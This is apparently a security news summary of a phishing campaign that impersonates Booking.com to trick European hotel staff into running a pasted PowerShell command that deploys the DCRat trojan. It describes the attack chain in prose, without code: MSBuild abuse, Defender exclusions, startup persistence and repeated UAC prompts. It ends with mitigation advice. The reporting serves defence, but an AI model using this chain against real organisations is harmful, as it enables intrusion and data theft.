A new cyberattack campaign, dubbed PHALT#BLYX, is targeting the European hospitality sector by impersonating Booking.com. Attackers are using deceptive "ClickFix" lures to trick hotel staff into executing malicious code, ultimately deploying the DCRat remote access trojan. The campaign was first detected in late December 2025 and highlights the evolving tactics of cybercriminals.

Key Takeaways

• Attackers use fake Booking.com cancellation emails to lure victims.

• Victims are redirected to spoofed websites that display fake Blue Screen of Death (BSoD) errors.

• The campaign leverages "Living off the Land" techniques, including the abuse of legitimate system tools like MSBuild.exe.

• The ultimate goal is to deploy the DCRat remote access trojan, capable of stealing sensitive information and executing commands.

• Evidence suggests the campaign is linked to Russian threat actors.

The Attack Chain Unveiled

The campaign begins with phishing emails that appear to be from Booking.com, warning recipients of unexpected reservation cancellations. These emails often include specific room charge details in Euros, suggesting a targeted approach towards European organizations. The messages urge recipients to click a link to confirm the cancellation.

This link directs the victim to a fake website that closely mimics Booking.com. Here, a simulated CAPTCHA page is presented, followed by a bogus Blue Screen of Death (BSoD) error page. This fake error page provides "recovery instructions" that prompt the user to open the Windows Run dialog, paste a command, and press Enter.

Executing Malicious Code

Unbeknownst to the victim, this action executes a PowerShell command. This command initiates a multi-stage process, starting with the download of an MSBuild project file from a malicious domain. The legitimate "MSBuild.exe" tool is then used to execute this project file, which contains embedded malicious code.

The initial PowerShell script is designed to fetch and execute remote code silently. The MSBuild project file is crucial for evading detection by configuring Microsoft Defender Antivirus exclusions, establishing persistence by placing a shortcut in the Startup folder, and downloading the DCRat malware. If the malware detects it has administrator privileges, it can disable security software entirely. Without elevated rights, it repeatedly triggers User Account Control (UAC) prompts in an attempt to gain the necessary permissions through user frustration.

As a distraction, the PowerShell code also opens the legitimate Booking.com admin page in the victim's default browser, creating the illusion that the actions taken were legitimate.

DCRat: A Versatile Remote Access Trojan

DCRat, also known as DarkCrystal RAT, is a .NET-based remote access trojan. It is a variant of AsyncRAT and is capable of harvesting sensitive information. Its plugin-based architecture allows for expandable functionality. Once deployed, DCRat can connect to a command and control (C2) server, profile the infected system, and await further instructions. This enables attackers to perform actions such as logging keystrokes, running arbitrary commands, and delivering additional payloads, including cryptocurrency miners.

Indicators and Mitigation

The campaign's use of "Living off the Land" techniques, such as abusing trusted system binaries like MSBuild.exe, demonstrates a sophisticated understanding of endpoint protection mechanisms. Researchers have identified Cyrillic debug strings within the MSBuild file, linking the activity to Russian threat actors. Organizations are advised to monitor PowerShell and MSBuild activities, detect suspicious .proj or .url files, and reinforce staff awareness regarding ClickFix-style phishing lures.

Sources

• Fake Booking Emails Redirect Hotel Staff to Fake BSoD Pages Delivering DCRat, The Hacker News.

• New ClickFix Attack Deploys Fake Windows BSOD Screens to Deceive Users into Running Malicious Code, Cyber Press.